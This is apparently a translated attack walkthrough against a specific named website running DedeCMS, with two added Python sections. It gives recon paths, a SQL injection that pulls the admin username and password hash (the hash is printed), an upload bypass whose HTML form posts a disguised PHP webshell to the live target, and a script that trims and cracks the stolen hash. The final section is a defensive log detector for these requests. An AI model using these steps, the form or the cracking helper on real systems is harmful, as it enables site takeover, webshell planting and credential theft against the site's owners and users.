① Injection vulnerability.
Target site: http://www.political-security.com/
First, visit the "/data/admin/ver.txt" page to get the date of the system's last upgrade,
and www.political-security.com/data/mysql_error_trace.inc leaks the admin backend path!
Then visit the "/member/ajax_membergroup.php?action=post&membergroup=1" page; as the screenshot shows, the vulnerability is present.
Then add the injection statement:
Retrieve the admin account
http://www.political-security.co ... &membergroup=@`
admin
Retrieve the admin password
http://www.political-security.co ... &membergroup=@`
8d29b1ef9f8c5a5af429
What comes back is 19 characters long; drop the first three and the last one to get the admin's 16-character MD5:
8d2
9b1ef9f8c5a5af42
9
cmd5 couldn't crack it, so I had to try the second method.
② Upload vulnerability

Just log in to the member center, then visit the link
"/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post"
As the screenshot shows, the upload page "/dialog/select_soft_post" has been successfully called through "/plus/carbuyaction.php".

So change the extension of the PHP one-line webshell to "rar" or the like, and use the submission page upload1.htm:

<!-- upload1.htm: posts the renamed file through carbuyaction.php to select_soft_post -->
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
  file: <input name="uploadfile" type="file" /><br>
  newname: <input name="newname" type="text" value="myfile.Php" /><br>
  <button class="button2" type="submit">Submit</button><br><br>
</form>

Or
then the upload succeeds.
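The trimming step in section ① (the value quoted on the page is 20 hex characters; dropping the first three and the last one leaves a 16-character MD5), as an added worked example that is not part of the original post. The paths in this write-up belong to DedeCMS, whose admin table stores passwords as substr(md5(pwd), 5, 20); the "16-bit MD5" that lookup services such as cmd5 accept is substr(md5(pwd), 8, 16), which is exactly the stored value with three leading and one trailing character removed. The password and wordlist below are constructed; the only real value is the hash quoted above.

```python
import hashlib

# Added example, not from the original post. Shows why the 20-character value
# pulled from the admin table can be cut down to a 16-character MD5 that a
# 16-bit MD5 lookup table (such as cmd5) can resolve.
#
# Assumed convention (DedeCMS): admin column = substr(md5(pwd), 5, 20), i.e.
# hex characters 5..24 of the 32-character MD5. The "16-bit MD5" is
# substr(md5(pwd), 8, 16), i.e. characters 8..23. Hence stored[3:19] == md5[8:24].


def md5_hex(password: str) -> str:
    """Full 32-character lowercase hex MD5 of the password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def dede_admin_hash(password: str) -> str:
    """Emulate the stored admin value: substr(md5(pwd), 5, 20) -> 20 hex chars."""
    return md5_hex(password)[5:25]


def trim_to_md5_16(stored: str) -> str:
    """Drop the first 3 and the last 1 character of the 20-char stored value.

    Anything that is not 20 characters long is not in the admin column's
    format, so refuse rather than silently slice a member-table (32-char) hash.
    """
    if len(stored) != 20:
        raise ValueError(f"expected a 20-character admin hash, got {len(stored)}")
    return stored[3:19]


def crack_md5_16(md5_16: str, wordlist):
    """Offline equivalent of a cmd5 16-bit lookup.

    Returns the first candidate whose md5(candidate)[8:24] equals the target,
    or None when the wordlist does not contain it.
    """
    target = md5_16.lower()
    for candidate in wordlist:
        if md5_hex(candidate)[8:24] == target:
            return candidate
    return None


if __name__ == "__main__":
    # Real value quoted in the post: trimming gives the 16 chars sent to cmd5.
    print(trim_to_md5_16("8d29b1ef9f8c5a5af429"))  # 9b1ef9f8c5a5af42

    # Constructed demonstration: made-up password and a tiny made-up wordlist.
    stored = dede_admin_hash("Example!2013")
    md5_16 = trim_to_md5_16(stored)
    print(stored, "->", md5_16)
    print(crack_md5_16(md5_16, ["123456", "admin", "Example!2013"]))
```

Run stand-alone, it prints the trimmed hash quoted in the post and a constructed crack. The practical point is that the admin value need not be reversed as a whole: it is a slice of an ordinary MD5, so a 16-character table is enough, and a length other than 20 means the value did not come from the admin column.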
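For defenders, an added detection pass (not part of the original post) over web-server access logs for the request patterns the write-up uses: reads of /data/admin/ver.txt and /data/mysql_error_trace.inc, a non-numeric membergroup sent to /member/ajax_membergroup.php, and an rs[code] sent to /plus/carbuyaction.php that contains path traversal. The log lines are constructed samples in combined log format with TEST-NET addresses and made-up timestamps; percent-encoding is decoded before matching so that an encoded backtick or bracket does not slip past the rule.

```python
import re
from urllib.parse import unquote

# Added example, not from the original post: flag the recon, injection and
# upload requests described in the write-up in combined-format access logs.
# Only paths that appear in the write-up are matched.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def _target(request_target: str):
    """Split a request target into a lowercase decoded path and a dict of
    decoded query parameters (first value wins). Decoding first defeats
    %60 / %5B style obfuscation of the payload."""
    path, _, query = request_target.partition("?")
    params = {}
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        params.setdefault(unquote(key).lower(), unquote(value))
    return unquote(path).lower(), params


def classify(request_target: str):
    """Return the list of rule names one request target triggers (empty if benign)."""
    path, params = _target(request_target)
    hits = []
    if path == "/data/admin/ver.txt":
        hits.append("recon: ver.txt read (last upgrade time)")
    if path == "/data/mysql_error_trace.inc":
        hits.append("recon: mysql_error_trace.inc read (leaks backend path)")
    if path == "/member/ajax_membergroup.php":
        membergroup = params.get("membergroup")
        # Legitimate use is a numeric group id; anything else is injection.
        if membergroup is not None and not membergroup.isdigit():
            hits.append("sqli: ajax_membergroup.php membergroup is not numeric")
    if path == "/plus/carbuyaction.php":
        code = params.get("rs[code]", "")
        # rs[code] should never be user-controlled, and never a path.
        if ".." in code or "/" in code:
            hits.append("traversal: carbuyaction.php rs[code] contains a path")
    return hits


def scan(log_lines):
    """Return (ip, request_target, hits) for every parsable line that triggers a rule."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m.group("path"))
        if hits:
            findings.append((m.group("ip"), m.group("path"), hits))
    return findings


# Constructed sample log: one attacker walk-through plus two benign requests.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2013:10:01:02 +0800] "GET /data/admin/ver.txt HTTP/1.1" 200 21
203.0.113.7 - - [12/Mar/2013:10:01:09 +0800] "GET /data/mysql_error_trace.inc HTTP/1.1" 200 812
203.0.113.7 - - [12/Mar/2013:10:02:30 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=1 HTTP/1.1" 200 340
203.0.113.7 - - [12/Mar/2013:10:03:41 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=@%60 HTTP/1.1" 200 512
203.0.113.7 - - [12/Mar/2013:10:05:00 +0800] "POST /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs%5Bcode%5D=../dialog/select_soft_post HTTP/1.1" 200 77
198.51.100.4 - - [12/Mar/2013:10:06:12 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=3 HTTP/1.1" 200 340
198.51.100.4 - - [12/Mar/2013:10:06:40 +0800] "GET /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888 HTTP/1.1" 302 0
""".splitlines()


if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(ip, target, hits)
```

The benign membergroup=1 probe from the write-up is deliberately not flagged on its own; it is indistinguishable from normal use, and it is the follow-up with a non-numeric value that gives the injection away. The same four hits clustered on one client IP inside a few minutes is the sequence worth alerting on.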